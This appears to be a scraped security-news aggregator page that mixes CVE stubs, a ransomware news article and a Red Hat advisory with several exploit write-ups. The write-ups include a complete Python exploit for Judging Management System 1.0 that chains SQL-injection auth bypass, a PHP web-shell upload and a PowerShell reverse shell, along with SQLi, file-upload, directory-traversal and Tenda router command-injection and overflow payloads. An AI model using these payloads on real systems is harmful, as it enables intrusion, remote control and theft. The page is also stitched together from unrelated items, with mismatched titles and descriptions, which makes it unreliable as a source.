**According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221103**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221103)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-44673: Windows Client Server Run-Time Subsystem (CSRSS) Elevation of Privilege Vulnerability

A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.

\### Description

A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.

\### Additional Information

The affected product is mounted on a Windows server with IIS 10.0, therefore, only arbitrary Windows files can be read.

\### Vulnerability Type

Directory Traversal

\### Vendor of Product

Linx Sphere

\### Affected Product Code Base

LINX 7.35.ST15 - Versions affected: < LINX 7.35.ST15

\### Affected Component

Service web SCS.Web.Server.SPI/1.0 in port 3000

\### Attack Type

Remote

\### Impact Information Disclosure

True

\### Attack Vectors

To exploit the vulnerability simply requires a remote attacker to use the following payload /.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../ and the file he wants to access. Example: http://192.168.1.10:3000/../../../../../../../../../../../../windows/iis.log

CVE-2022-45269: CVE-2022-45269

Judging Management System version 1.0 a remote shell upload vulnerability.

    # Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP serverimport requests,argparse,re,time,base64import urllib.parsefrom colorama import (Fore as F,Back as B,Style as S)from bs4 import BeautifulSoupBANNER = """╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝"""def argsetup():    desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'    parser = argparse.ArgumentParser(description=desc)    parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)    args = parser.parse_args()    return args# Performs Auth bypass in order to get the admin cookiedef auth_bypass(args):    print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")    session = requests.Session()    loginUrl = f"{args.target}/login.php"    username = """' OR 1=1-- -"""    password = "randomvalue1234"    data = {'username': username, 'password': password}    login = session.post(loginUrl,verify=False,data=data)    admin_cookie = login.cookies['PHPSESSID']    print(F.GREEN+"[+] Admin cookies obtained !!!")    return admin_cookie# Checks if the file has been uploaded to /uploads directorydef check_file(args,cookie):    uploads_endpoint = f"{args.target}/uploads/"    cookies = {'PHPSESSID': f'{cookie}'}    req = requests.get(uploads_endpoint,verify=False,cookies=cookies)    soup = BeautifulSoup(req.text,features='html.parser')    files = soup.find_all("a")    for i in range (len(files)):        match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))        if match:            file = files[i].get('href')            print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)            return file                return Nonedef file_upload(args,cookie):    now = int(time.time())    endpoint = f"{args.target}/edit_organizer.php"    cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}    get_req = requests.get(endpoint,verify=False,cookies=cookies)    soup = BeautifulSoup(get_req.text,features='html.parser')    username = soup.find("input",{"name":"username"}).get('value')    admin_password = soup.find("input",{"id":"password"}).get('value')    print(F.GREEN + "[+] Admin username: " + username)    print(F.GREEN + "[+] Admin password: " + admin_password)            # Multi-part request    file_dict = {        'fname':(None,"Random"),        'mname':(None,"Random"),        'lname':(None,"Random"),        'email':(None,"ranom@mail.com"),        'pnum':(None,"014564343"),        'cname':(None,"Random"),        'caddress':(None,"Random"),        'ctelephone':(None,"928928392"),        'cemail':(None,"company@mail.com"),        'cwebsite':(None,"http://company.com"),        'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),        'username':(None,f"{admin_password}"),        'passwordx':(None,f"{admin_password}"),        'password2x':(None,f"{admin_password}"),        'password':(None,f"{admin_password}"),        'update':(None,"")    }        req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)def exploit(args,cookie,file):    payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """    uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"    cookies = {'PHPSESSID': f'{cookie}'}    print(F.GREEN + "\n[+] Enjoy your reverse shell ")    requests.get(uploads_endpoint,verify=False,cookies=cookies)                if __name__ == '__main__':    print(F.CYAN +  BANNER)    args = argsetup()    cookie=auth_bypass(args=args)    file_upload(args=args,cookie=cookie)    file_name=check_file(args=args,cookie=cookie)    if file_name is not None:        exploit(args=args,cookie=cookie,file=file_name)            else:        print(F.RED + "[!] File not found")

Judging Management System 1.0 Shell Upload

Vohuk, ScareCrow, and AESRT add to the ransomware chaos that organizations have to contend with on a daily basis.

Enterprise security teams can add three more ransomware variants to the constantly growing list of ransomware threats for which they need to monitor.

The three variants — Vohuk, ScareCrow, and AESRT — like most ransomware tools, target Windows systems and appear to be proliferating relatively rapidly on systems belonging to users in multiple countries. Security researchers at Fortinet's FortiGuard Labs who are tracking the threats this week described the ransomware samples as gaining traction within the company's ransomware database.

Fortinet's analysis of the three threats showed them to be standard ransomware tools of the sort that nevertheless have been very effective at encrypting data on compromised systems. Fortinet's alert did not identify how the operators of the new ransomware samples are distributing their malware, but it noted that phishing email has typically been the most common vector for ransomware infections.

**A Growing Number of Variants**

"If the growth of ransomware in 2022 indicates what the future holds, security teams everywhere should expect to see this attack vector become even more popular in 2023," says Fred Gutierrez, senior security engineer, at Fortinet’s FortiGuard Labs.

In just the first half of 2022, the number of new ransomware variants that FortiGuard Labs identified increased by nearly 100% compared with the previous six-month period, he says. The FortiGuard Labs team documented 10,666 new ransomware variants in the first half of 2022 compared with just 5,400 in second half of 2021.

"This growth in new ransomware variants is primarily thanks to more attackers taking advantage of ransomware-as-a-service (RaaS) on the Dark Web," he says.

He adds: "In addition, perhaps the most disturbing aspect is that we are seeing an increase in more destructive ransomware attacks at scale and across virtually all sector types, which we expect to continue into 2023."

**Standard but Effective Ransomware Strains**

The Vohuk ransomware variant that Fortinet researchers analyzed appeared to be in its third iteration, indicating that its authors are actively developing it. 

The malware drops a ransom note, "README.txt," on compromised systems that asks victims to contact the attacker via email with a unique ID, Fortinet said. The note informs the victim that the attacker is not politically motivated but is only interested in financial gain — presumably to reassure victims they would get their data back if they paid the demanded ransom.

Meanwhile, "ScareCrow is another typical ransomware that encrypts files on victims’ machines," Fortinet said. "Its ransom note, also entitled 'readme.txt,' contains three Telegram channels that victims can use to speak with the attacker." 

Though the ransom note does not contain any specific financial demands, it's safe to assume that victims will need to pay a ransom to recover files that were encrypted, Fortinet said.

The security vendor's research also showed some overlap between ScareCrow and the infamous Conti ransomware variant, one of the most prolific ransomware tools ever. Both, for instance, use the same algorithm to encrypt files, and just like Conti, ScareCrow deletes shadow copies using the WMI command line utility (wmic) to make data irrecoverable on infected systems. 

Submissions to VirusTotal suggest that ScareCrow has infected systems in the United States, Germany, Italy, India, the Philippines, and Russia.

And finally, AESRT, the third new ransomware family that Fortinet recently spotted in the wild, has functionality that's similar to the other two threats. The main difference is that instead of leaving a ransom note, the malware delivers a popup window with the attacker's email address, and a field that displays a key for decrypting encrypted files once the victim has paid up the demanded ransom.

**Will Crypto-Collapse Slow the Ransomware Threat?**

The fresh variants add to the long — and constantly growing — list of ransomware threats that organizations now have to deal with on a daily basis, as ransomware operators keep relentlessly hammering away at enterprise organizations. 

Data on ransomware attacks that LookingGlass analyzed earlier this year showed there were some 1,133 confirmed ransomware attacks in the first half of 2022 alone — more than half (52%) of which affected US companies. LookingGlass found the most active ransomware group was that behind the LockBit variant, followed by groups behind Conti, Black Basta, and Alphy ransomware.

However, the rate of activity isn't steady. Some security vendors reported observing a slight slowdown in ransomware activity during certain parts of the year.

In a midyear report, SecureWorks, for example, said its incident response engagements in May and June suggested the rate at which successful new ransomware attacks were happening had slowed down a bit.

SecureWorks identified the trend as likely having to do, at least in part, with the disruption of the Conti RaaS operation this year and other factors such as the disruptive effect of the war in Ukraine on ransomware gangs.

Another report, from the Identity Theft Resource Center (ITRC), reported a 20% decline in ransomware attacks that resulted in a breach during second quarter of 2022 compared with the first quarter of the year. ITRC, like SecureWorks, identified the decline as having to do with the war in Ukraine and, significantly, with the collapse of cryptocurrencies that ransomware operators favor for payments.

Bryan Ware, CEO of LookingGlass, says he believes the crypto-collapse could hinder ransomware operators in 2023. 

"The recent FTX scandal has cryptocurrencies tanking, and this affects the monetization of ransomware and essentially makes it unpredictable," he says. "This does not bode well for ransomware operators as they are going to have to consider other forms of monetization over the long term."

Ware says the trends around cryptocurrencies has some ransomware groups considering using their own cryptocurrencies: "We’re unsure that this will materialize, but overall, ransomware groups are worried about how they will monetize and maintain some level of anonymity going forward."

Rash of New Ransomware Variants Springs Up in the Wild

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Judging Management System 1.0 SQL Injection

Red Hat Security Advisory 2022-8913-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector, the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release of Red Hat JBoss Web Server 5.7.1 serves as a replacement for Red Hat JBoss Web Server 5.7.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References. Issues addressed include a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat JBoss Web Server 5.7.1 release and security updateAdvisory ID:       RHSA-2022:8913-01Product:           Red Hat JBoss Web ServerAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:8913Issue date:        2022-12-12CVE Names:         CVE-2022-1292 CVE-2022-2068====================================================================1. Summary:Red Hat JBoss Web Server 5.7.1 zip release is now available for Red HatEnterprise Linux 7, Red Hat Enterprise Linux 8, and Microsoft Windows.Red Hat Product Security has rated this release as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Red Hat JBoss Web Server is a fully integrated and certified set ofcomponents for hosting Java web applications. It is comprised of the ApacheTomcat Servlet container, JBoss HTTP Connector (mod_cluster), thePicketLink Vault extension for Apache Tomcat, and the Tomcat Nativelibrary.This release of Red Hat JBoss Web Server 5.7.1 serves as a replacement forRed Hat JBoss Web Server 5.7.0. This release includes bug fixes,enhancements and component upgrades, which are documented in the ReleaseNotes, linked to in the References.Security Fix(es):* openssl: c_rehash script allows command injection (CVE-2022-1292)* openssl: the c_rehash script allows command injection (CVE-2022-2068)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection5. References:https://access.redhat.com/security/cve/CVE-2022-1292https://access.redhat.com/security/cve/CVE-2022-2068https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=5.76. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY5dYC9zjgjWX9erEAQgfkA//RUnedME5QNj3g69CjzJscB2MD8jYEeRE+iDXJJh8PoUV1Bxqi9Ma+g9r1LjLFmznVnlhisPhzoLDinZztF2qqE21uMdAZNsrGDZXP6yRy0bG9Z+kJWzRcRYbbj6/+/MSbMSlxCw/XaZElrd1+ohaoInVPTlwDlzj4y7wgDqY4oblLR23YKpo/9JoZ2ZQhv7tX2QXYvCo4sutVYKWceycUNbJu+wzyCKG8H8/YQc1gAicr+kqznSrg1n58xnFaBaPRJu9gsSEQA5FZ4B8ycHDCsbrnKHvu6NSrjo13lZK5I7UePZxiBapoaDCA+P1XjUzXs+t98Im+QLwClzQbWVnKGoWNu80ywokArSxIqb9trh0pALCZAGATcTfJZiOjg6l44/B7iP1BVH7YwUDuAlzL/JSKnE/R2SH3AsTYH/OS3vzmKBVIK8rxQrRniQAE9fBWZdTpkUTBYJdWbhmWbs/UZ0a1PmneIXwCVKvBTHULwWCPswHz6BjMzRV7ThqM2Iz2yBMLWNXj1NgPYfihhsI4CJp85johMtivX5YUCCuZ7GUD72G4LtOnN4WBavZgFX8gns3FbWGbcDH7oKPCoS/UlmQSNYs15Wvra2o39KWOdYzCo+Ey3QKPJPieb7MW887/uOEjI6UvkeCd7xyczxu4qgePIZ1Pl/PPRiEFSBrdK0=MX0e-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8913-01

An arbitrary file upload vulnerability in /queuing/admin/ajax.php?action=save_settings of Dynamic Transaction Queuing System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Dynamic Transaction Queuing System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: ATKF

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin123 (Super Admin account)

Vulnerability url: ip/queuing/admin/ajax.php?action=save\_settings

Loophole location: Dynamic Transaction Queuing System's "/queuing/admin/ajax.php?action=save\_settings" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /queuing/admin/ajax.php?action\=save\_settings HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/queuing/admin/index.php?page=site\_settings
Content-Length: 603
Content-Type: multipart/form-data; boundary=---------------------------62511349610243
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
\-----------------------------62511349610243
Content-Disposition: form-data; name="name"
admin
\-----------------------------62511349610243
Content-Disposition: form-data; name="email"
1@qq.com
\-----------------------------62511349610243
Content-Disposition: form-data; name="contact"
11
\-----------------------------62511349610243
Content-Disposition: form-data; name="about"
\-----------------------------62511349610243
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: image/jpeg
<?php phpinfo(); ?>
\-----------------------------62511349610243--

The files will be uploaded to this directory \\queuing\\admin\\assets\\img  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-45275: bug_report/RCE-1.md at main · ATKF/bug_report

Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output.

**Tenda W20E Command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is a Command injection vulnerability in tenda W20E V16.01.0.6(3392), which can execute arbitrary command in route system.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function do\_ping\_action:

The program passes the contents obtained by the hostName parameter to hostname.  
There is some filtering of parameters is judged by if, but we can bypass it, which is explained in the next section.  
Then, copy the content of hostname through the strncpy function into cfg.hostname.  
And cfg is called by function cmd\_get\_ping\_output().  
In function cmd\_get\_ping\_output：

Then, format the matching content of cfg.hostname through the snprintf function into new\_cmd\_buf.  
The new\_cmd\_buf is called by popen().  
There is a command injection vulnerability.  
The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack. In the judgment of If, you can see that the characters(; | &) are filtered, and if these characters are included, code will goto fail. But we can use '$' to do Command injection.  
 The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668695093889 HTTP/1.1
Host: 192.168.0.1
Content-Length: 87
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=70ebc4f9c9d22827a5874d1bb6f06abddwdvmy; bLanguage=cn; sessionid=W20Ev5:0.167.3:6b0846
Connection: close

{"setFixTools":{"networkTool":1,"hostName":"test$(touch /tmp/test0)","packageSize":32}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

Figure shows POC attack effect, the file test0 is created.

**CVE-ID**

unsigned

CVE-2022-45996: public_bug/tenda/w20e/2 at main · bugfinder0/public_bug

Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.

**Tenda W20E Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is an buffer overflow vulnerability in tenda W20E V16.01.0.6(3392), which can cause httpd to crash and restart.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function formSetPortMirror, the corresponding function field is setPortMirror.

In function formSetPortMirror:

The program passes the contents obtained by the portMirrorMirroredPorts parameter to pMirroredPorts.  
Then, format the matching content of pMirroredPorts through the sprintf function into sMibValue.  
There is no size check, so there is a vulnerability that can cause buffer overflow through portMirrorMirroredPorts field.

The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668753675738 HTTP/1.1
Host: 192.168.0.1
Content-Length: 95
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: curShow=; bLanguage=cn; sessionid=W20Ev5:0.133.2:f012ed
Connection: close

{"setPortMirror":{"portMirrorEn":true,"portMirrorLanPort":4,"portMirrorMirroredPorts":"1,0,0a\*200"}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

And attack twice:

Figure shows POC attack effect, the binary httpd restarts, because the process id changed.

**CVE-ID**

unsigned

CVE-2022-45997: public_bug/tenda/w20e/1 at main · bugfinder0/public_bug

Tenda AX12 v22.03.01.21_CN was discovered to contain a stack overflow via the ssid parameter at /goform/fast_setting_wifi_set .

**Vulnerability description**

Affect device：Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability cause**

In the /goform/fast\_setting\_wifi\_set interface, the ssid parameter and the sprintf function passed through it do not limit the length, which will cause stack overflow and achieve the effect of a DoS denial of service attack.

**POC**

Poc of Denial of Service(DoS):

POST /goform/fast\_setting\_wifi\_set HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 10
Origin: http://192.168.0.1
Connection: close
Cookie: password=xxxxxxxxxx
Referer: http://192.168.0.1/main.html

ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+1000\*a

Tag

#windows